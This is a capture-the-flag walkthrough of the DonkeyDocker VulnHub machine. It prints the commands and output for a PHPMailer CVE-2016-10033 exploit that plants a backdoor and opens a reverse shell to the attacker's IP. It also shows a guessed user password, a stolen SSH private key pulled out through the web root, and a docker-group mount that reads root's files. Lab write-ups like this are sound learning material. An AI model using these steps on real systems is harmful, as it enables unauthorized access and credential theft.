DonkeyDocker 1 – Walkthrough

Overview

CTF Challenge attempted – https://www.vulnhub.com/entry/donkeydocker-1,189/

Tip I found from the setup – if VMWare offers to upgrade the DonkeyDocker image, don’t do it. I did on mine & it broke the IP connectivity from Kali.

This is my first attempt at a CTF, so was an enjoyable learning exercise. I’ve loosely grouped the steps taken below into Reconnaissance & Scanning, Access & Escalation and Exfiltration.

Useful things I learnt along the way:

  • Try simple things first before going with the complicated (i.e. try and guess passwords)
  • Document as you go, it saves having to retrospectively write up what you have done

Reconnaissance & Scanning

First up let’s go and find the host.

[bash]
root@kali:~/Downloads# nmap -sn 192.168.195.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-08 17:41 AEST
MAC Address: 00:0C:29:8D:B7:6E (VMware)
Nmap scan report for 192.168.195.134
Host is up (0.00027s latency). [/bash]

Extra virtual machines filtered out – so we know the target host is at 192.168.195.134. Now let’s see what’s running.

[bash]
root@kali:~/Downloads# nmap -A 192.168.195.134

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-08 18:38 AEST
Nmap scan report for 192.168.195.134
Host is up (0.00067s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:38:ce:11:9c:b2:7a:48:58:c9:76:d5:b8:bd:bd:57 (RSA)
|_ 256 d7:5e:f2:17:bd:18:1b:9c:8c:ab:11:09:e8:a0:00:c2 (ECDSA)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 3 disallowed entries
|_/contact.php /index.php /about.php
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Docker Donkey
MAC Address: 00:0C:29:EA:52:D0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 192.168.195.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds [/bash]

Okay so we have a SSH & web service running.

First step let’s see what SSH tells us
[bash]
root@kali:~/Downloads# ssh 192.168.195.134
Permission denied (publickey,keyboard-interactive).
root@kali:~/Downloads# [/bash]

So there will be no brute force guessing the password – the image is looking for a saved ssh key to login.

Next let’s pickup the robots.txt and see what the webserver has to tell us.
[bash]
root@kali:~/Downloads# wget 192.168.195.134/robots.txt
root@kali:~/Downloads# cat robots.txt
User-agent: *
Disallow: /contact.php
Disallow: /index.php
Disallow: /about.php
[/bash]

Looking at the website, we have a fairly basic home page (index.php), an about page that returns an error and a contact form that looks interesting.

A search of vulnerabilities on Apache 2.4.10 & OpenSSH doesn’t reveal an easy way in, so on with more scanning. For the next stage I tried dirb to see what else was on the website.

[bash]
root@kali:~# dirb http://192.168.195.134/ -o donkey_dirb.scan
root@kali:~# cat donkey_dirb.scan | grep CODE:200
+ http://192.168.195.134/about (CODE:200|SIZE:2098)
+ http://192.168.195.134/contact (CODE:200|SIZE:3207)
+ http://192.168.195.134/index (CODE:200|SIZE:4090)
+ http://192.168.195.134/robots.txt (CODE:200|SIZE:79)
+ http://192.168.195.134/mailer/LICENSE (CODE:200|SIZE:26421)
+ http://192.168.195.134/mailer/examples/index.html (CODE:200|SIZE:6289)
[/bash]

Loading up /mailer/examples/index.html reveals an installed instance of PHPMailer. Based off reviewing the GitHub page for PHPMailer – I know the version number should be stored at /mailer/VERSION. Checking this reveals we are running version 5.2.16.

Doing a quick search leads me to CVE-2016-10033 & https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html. Remote code execution in PHPMailer versions under 5.2.18 – looks like our way in.

Access & Escalation

From the above link I downloaded a copy of PwnScriptum_RCE_exploit.py, running it yields:

[bash]
root@kali:~/Downloads# python PwnScriptum_RCE_exploit.py root@kali:~/Downloads# python PwnScriptum_RCE_exploit.py      __                     __   __  __           __                    / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/             /____/

PHPMailer / Zend-mail / SwiftMailer – Remote Code Execution Exploit     a.k.a “PwnScriptum”
CVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074

This PoC exploit aims to execute a reverse shell on the target in the context of the web-server user via vulnerable PHP email library.

Discovered and Coded by:
Dawid Golunski https://legalhackers.com
t: @dawid_golunski for updates
P.$. For testing only! Don’t break the Web 😉

usage: PwnScriptum_RCE_exploit.py [-h] [-H] -url WEBAPP_BASE_URL -cf                                  CONTACT_SCRIPT [-d TARGET_UP_DIR] -ip ATTACKERS_IP [-p ATTACKERS_PORT] [–version] [–post-action POST_ACTION] [–post-name POST_NAME] [–post-email POST_EMAIL]  [–post-msg POST_MSG]PwnScriptum_RCE_exploit.py: error: argument -url is required
root@kali:~/Downloads#
[/bash]

Viewing the source of http://192.168.195.134/contact gives me the input fields I need:

Now to run the script:

[bash]
root@kali:~/Downloads# python PwnScriptum_RCE_exploit.py -url http://192.168.195.134/ -cf contact -d mailer -ip 192.168.195.146 -p 7248 –post-action submit –post-name name –post-email email –post-msg messageroot@kali:~/Downloads# python PwnScriptum_RCE_exploit.py -url http://192.168.195.134/ -cf contact -d mailer -ip 192.168.195.146 -p 7248 –post-action submit –post-name name –post-email email –post-msg message     __                     __   __  __           __                    / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/             /____/

PHPMailer / Zend-mail / SwiftMailer – Remote Code Execution Exploit     a.k.a “PwnScriptum”
CVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074

This PoC exploit aims to execute a reverse shell on the target in the context of the web-server user via vulnerable PHP email library.

Discovered and Coded by:
Dawid Golunski https://legalhackers.com
t: @dawid_golunski for updates
P.$. For testing only! Don’t break the Web 😉

[+] Setting vars to:
WEBAPP_BASE_URL     = [http://192.168.195.134/]CONTACT_SCRIPT      = [contact]TARGET_UP_DIR       = [mailer]ATTACKERS_IP        = [192.168.195.146]ATTACKERS_PORT      = [7248]CONTACT_SCRIPT_URL  = [http://192.168.195.134/contact]BACKDOOR_FILEl      = [phpbackdoor9573.php]
[+] Choose your target / payload:
[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045)        The escapeshellarg() bypass 🙂
[3] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
[4] Zend Framework / zend-mail < 2.4.11 – Remote Code Execution (CVE-2016-10034)

[?] Select target [1-2]: 1
[+] Generated mail() payload will upload the backdoor into the ‘mailer’ dir
[+] Backdoor upload via the contact form at the URL ‘http://192.168.195.134/contact’
[+] Checking for the backdoor at the URL ‘http://192.168.195.134/mailer/phpbackdoor9573.php’

[*] Looking good! The sleep() worked by the looks of it 🙂
Urlopen timed out just in time for the shell 🙂

[+] We should get a shell if we got till here! Spawning netcat now! 🙂

[+] Please tell me you’re seeing this too… 😉

listening on [any] 7248 …
192.168.195.134: inverse host lookup failed: Unknown host
connect to [192.168.195.146] from (UNKNOWN) [192.168.195.134] 40788
bash: cannot set terminal process group (13): Inappropriate ioctl for device
bash: no job control in this shell
www-data@12081bd067cc:/www/mailer$
[/bash]

And we have a shell 🙂

Now we are in, let’s have a little poke around
[bash]
www-data@12081bd067cc:/www/mailer$ whoami
whoami
www-data
www-data@12081bd067cc:/www/mailer$ cd /
cd /
www-data@12081bd067cc:/$ ls -al
ls -al
total 80
drwxr-xr-x 1 root root 4096 Mar 26 10:33 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
-rwxr-xr-x 1 root root 0 Mar 26 10:33 .dockerenv
drwxr-xr-x 1 root root 4096 Mar 26 10:31 bin
drwxr-xr-x 2 root root 4096 Dec 28 2016 boot
drwxr-xr-x 5 root root 320 Jul 8 15:47 dev
drwxr-xr-x 1 root root 4096 Mar 26 10:33 etc
drwxr-xr-x 1 root root 4096 Mar 26 10:33 home
drwxr-xr-x 1 root root 4096 Nov 27 2014 lib
drwxr-xr-x 2 root root 4096 Mar 20 23:27 lib64
-rwxr-xr-x 1 root root 289 Mar 24 22:23 main.sh
drwxr-xr-x 2 root root 4096 Mar 20 23:26 media
drwxr-xr-x 2 root root 4096 Mar 20 23:26 mnt
drwxr-xr-x 2 root root 4096 Mar 20 23:26 opt
dr-xr-xr-x 137 root dip 0 Jul 8 15:47 proc
drwx—— 1 root root 4096 Mar 26 10:31 root
drwxr-xr-x 1 root root 4096 Mar 26 10:32 run
drwxr-xr-x 2 root root 4096 Mar 20 23:29 sbin
drwxr-xr-x 2 root root 4096 Mar 20 23:26 srv
dr-xr-xr-x 13 root root 0 Jul 8 16:11 sys
drwxrwxrwt 1 root root 4096 Jul 9 01:44 tmp
drwxr-xr-x 1 root root 4096 Mar 20 23:26 usr
drwxr-xr-x 1 root root 4096 Mar 26 10:31 var
drwxrwxrwx 1 root root 4096 Jul 7 21:06 www
www-data@12081bd067cc:/$ cd /etc/ssl
cd /etc/ssl
www-data@12081bd067cc:/etc/ssl$ ls -al
ls -al
total 44
drwxr-xr-x 4 root root 4096 Mar 26 10:32 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
drwxr-xr-x 2 root root 20480 Mar 26 10:32 certs
-rw-r–r– 1 root root 10835 Jan 26 23:39 openssl.cnf
drwx–x— 2 root ssl-cert 4096 Mar 26 10:32 private
www-data@12081bd067cc:/etc/ssl$ cd /home
cd /home
www-data@12081bd067cc:/home$ ls -al
ls -al
total 12
drwxr-xr-x 1 root root 4096 Mar 26 10:33 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
drwx—— 1 smith users 4096 Jul 7 22:58 smith
www-data@12081bd067cc:/home$ cd /
cd /
www-data@12081bd067cc:/$
www-data@12081bd067cc:/$ cat main.sh
cat main.sh
#!/bin/bash

# change permission
chown smith:users /home/smith/flag.txt

# Start apache
source /etc/apache2/envvars
a2enmod rewrite
apachectl -f /etc/apache2/apache2.conf

sleep 3
tail -f /var/log/apache2/*&

# Start our fake smtp server
python -m smtpd -n -c DebuggingServer localhost:25
www-data@12081bd067cc:/$
[/bash]

Conclusions taken so far are:

  • We appear to be operating inside a docker container. There is a .dockerenv file in the root directory, there is no sshd_config file (but the service is running on the host) & the name of the challenge kinda gives it away
  • There is a user named smith
  • The first flag appears to be in the users home directory

Onwards to try and guess a few passwords.

[bash]
www-data@12081bd067cc:/$ su smith
su smith
su: must be run from a terminal
[/bash]

Su doesn’t seem to like the terminal www-data is running in, let’s try and spawn a new shell.

[bash]
www-data@12081bd067cc:/$ which python
which python
/usr/bin/python
www-data@12081bd067cc:/$ which bash
which bash
/bin/bash
www-data@12081bd067cc:/$ python -c ‘import pty; pty.spawn(“/bin/bash”);’
python -c ‘import pty; pty.spawn(“/bin/bash”);’
www-data@12081bd067cc:/$ su smith
su smith
Password: smith

smith@12081bd067cc:/$
[/bash]

First guess worked, now let’s see what’s in the users home directory.

[bash]
smith@12081bd067cc:/$ cd /home/smith
cd /home/smith
smith@12081bd067cc:~$ ls -al
ls -al
total 32
drwx—— 1 smith users 4096 Jul 7 22:58 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
-rw——- 1 smith users 0 Jul 7 22:58 .bash_history
-rw-r–r– 1 smith users 220 Nov 5 2016 .bash_logout
-rw-r–r– 1 smith users 3515 Nov 5 2016 .bashrc
-rw-r–r– 1 smith users 675 Nov 5 2016 .profile
drwx–S— 2 smith users 4096 Mar 22 05:01 .ssh
-rw-r–r– 1 smith users 237 Mar 22 04:47 flag.txt
smith@12081bd067cc:~$ cat flag.txt
cat flag.txt
This is not the end, sorry dude. Look deeper!
I know nobody created a user into a docker
container but who cares? 😉

But good work!
Here a flag for you: flag0{9fe3ed7d67635868567e290c6a490f8e}

PS: I like 1984 written by George ORWELL
smith@12081bd067cc:~$
[/bash]

And flag # 1 captured. The message confirms I’m running in a docker container, so need to look deeper. Emphasis is also on the name orwell.

Onwards to dig deeper:

[bash]
smith@12081bd067cc:~$ cd .ssh
cd .ssh
smith@12081bd067cc:~/.ssh$ ls -al
ls -al
total 20
drwx–S— 2 smith users 4096 Mar 22 05:01 .
drwx—— 1 smith users 4096 Jul 7 22:58 ..
-rwx—— 1 smith users 101 Mar 22 05:01 authorized_keys
-rwx—— 1 smith users 411 Mar 22 04:48 id_ed25519
-rwx—— 1 smith users 101 Mar 22 04:48 id_ed25519.pub
smith@12081bd067cc:~/.ssh$ cat id_ed25519.pub
cat id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICEBBzcffpLILgXqY77+z7/Awsovz/jkhOd/0fDjvEof orwell@donkeydocker
smith@12081bd067cc:~/.ssh$
[/bash]

Hmmm, ssh keys (including the name orwell). Let’s pickup a copy of these.

[bash]
smith@12081bd067cc:~/.ssh$ cp id* /tmp
cp id* /tmp
smith@12081bd067cc:~/.ssh$ cd /tmp
cd /tmp
smith@12081bd067cc:/tmp$ ls -al
ls -al
total 9928
drwxrwxrwt 1 root root 4096 Jul 9 02:20 .
drwxr-xr-x 1 root root 4096 Mar 26 10:33 ..
-rw-rw—- 1 www-data www-data 103 Jul 7 06:13 dfv676BqRL000023
-rw-rw—- 1 www-data www-data 103 Jul 7 06:29 dfv676R0YA000044
-rw-rw—- 1 www-data www-data 17 Jul 7 07:43 dfv677flLv001719
drwxr—– 2 www-data www-data 4096 Jul 7 07:52 fakemail
-rwx—— 1 smith users 411 Jul 9 02:20 id_ed25519
-rwx—— 1 smith users 101 Jul 9 02:20 id_ed25519.pub
drwxr-xr-x 3 www-data www-data 4096 Jul 7 21:44 output
-rw-rw—- 1 www-data www-data 993 Jul 7 06:15 qfv676BqRL000023
-rw-rw—- 1 www-data www-data 993 Jul 7 06:31 qfv676R0YA000044
-rw-rw—- 1 www-data www-data 2318 Jul 7 07:45 qfv677flLv001719
smith@12081bd067cc:/tmp$ chmod 644 id*
chmod 644 id*
smith@12081bd067cc:/tmp$ cp id* /www/mailer
cp id* /www/mailer
cp: cannot create regular file ‘/www/mailer/id_ed25519’: Permission denied
cp: cannot create regular file ‘/www/mailer/id_ed25519.pub’: Permission denied
[/bash]

Okay, so smith cannot write files to the /www/mailer directory, back to our www-data user
[bash]
smith@12081bd067cc:/tmp$ logout
logout
bash: logout: not login shell: use `exit’
smith@12081bd067cc:/tmp$ exit
exit
exit
www-data@12081bd067cc:/$ cd /tmp
cd /tmp
www-data@12081bd067cc:/tmp$ cp id* /www/mailer
cp id* /www/mailer
www-data@12081bd067cc:/tmp$
[/bash]

Now to pick the private key up off my kali image and see if logging in via ssh works (noted earlier that ssh into the main vm seems to only expect a key, no password)

[bash]
root@kali:~/Downloads# wget 192.168.195.134/mailer/id_ed25519
–2017-07-10 06:54:16– http://192.168.195.134/mailer/id_ed25519
Connecting to 192.168.195.134:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 411
Saving to: ‘id_ed25519’

id_ed25519 100%[===================>] 411 –.-KB/s in 0s

2017-07-10 06:54:16 (30.8 MB/s) – ‘id_ed25519’ saved [411/411]

root@kali:~/Downloads# chmod 400 id_ed25519
[/bash]

Now to see if the key lets us in

[bash]
root@kali:~/Downloads# ssh -i id_ed25519 orwell@192.168.195.134
Welcome to

___ _ ___ _
| \ ___ _ _ | |_____ _ _| \ ___ __| |_____ _ _
| |) / _ \ ‘ \| / / -_) || | |) / _ \/ _| / / -_) ‘_|
|___/\___/_||_|_\_\___|\_, |___/\___/\__|_\_\___|_|
|__/
Made with <3 v.1.0 – 2017

This is my first boot2root – CTF VM. I hope you enjoy it.
if you run into any issue you can find me on Twitter: @dhn_
or feel free to write me a mail to:

– Email: dhn@zer0-day.pw
– GPG key: 0x2641123C
– GPG fingerprint: 4E3444A11BB780F84B58E8ABA8DD99472641123C

Level: I think the level of this boot2root challange
is hard or intermediate.

Try harder!: If you are confused or frustrated don’t forget
that enumeration is the key!

Thanks: Special thanks to @1nternaut for the awesome
CTF VM name!

Feedback: This is my first boot2root – CTF VM, please
give me feedback on how to improve!

Looking forward to the write-ups!

donkeydocker:~$
[/bash]

And we are in – now to have a small poke around.

[bash]

donkeydocker:~$ id
uid=1000(orwell) gid=1000(orwell) groups=101(docker),1000(orwell)
donkeydocker:~$ ls -al
total 24
drwxr-sr-x 3 orwell orwell 4096 Jul 9 05:58 .
drwxr-xr-x 3 root root 4096 Mar 22 05:44 ..
-rw-r–r– 1 root orwell 1 Mar 26 12:39 .ash
-rw——- 1 orwell orwell 16 Jul 9 06:06 .ash_history
drwx–S— 2 orwell users 4096 Mar 22 06:01 .ssh
-rw-r–r– 1 orwell orwell 104 Mar 22 07:34 flag.txt
donkeydocker:~$ cat flag.txt
You tried harder! Good work 😉

Here a flag for your effort: flag01{e20523853d6733721071c2a4e95c9c60}

donkeydocker:~$

[/bash]

The second flag is now ours – of more interest we also appear to be part of the docker group. Off to do some more research. The main link I’ve found of use is https://docs.docker.com/engine/reference/commandline/cli/

[bash]
donkeydocker:~$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
12081bd067cc donkeydocker “/main.sh default” 3 months ago Up 27 seconds 0.0.0.0:80->80/tcp donkeydocker
donkeydocker:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
donkeydocker latest ae644a321321 3 months ago 276 MB
debian jessie 8cedef9d7368 3 months ago 123 MB
donkeydocker:~$
[/bash]

From this I can the user orwell can indeed run docker commands, there is one container running (donkeydocker) and two images available.

Further research reveals (https://reventlov.com/advisories/using-the-docker-command-to-root-the-host). From this I see a user with docker permissions (orwell) can use docker to run commands as root. Tinkering with some commands we now have:

[bash]
donkeydocker:~$ docker run -v /root:/hack -t debian:jessie /bin/sh -c ‘ls -la /hack’
total 24
drwx—— 3 root root 4096 Mar 26 10:39 .
drwxr-xr-x 1 root root 4096 Jul 10 20:22 ..
-rw-r–r– 1 root root 1 Mar 26 10:39 .ash
-rw——- 1 root root 59 Mar 26 10:39 .ash_history
drwxr-xr-x 5 root root 4096 Mar 22 04:29 donkeydocker
-rw-r–r– 1 root root 195 Mar 22 04:39 flag.txt
donkeydocker:~$ docker run -v /root:/hack -t debian:jessie /bin/sh -c ‘cat /hack/flag.txt’
YES!! You did it :-). Congratulations!

I hope you enjoyed this CTF VM.

Drop me a line on twitter @dhn_, or via email dhn@zer0-day.pw

Here is your flag: flag2{60d14feef575bacf5fd8eb06ec7cd8e7}
[/bash]

Third (and hopefully last) flag found 🙂

Leave a Reply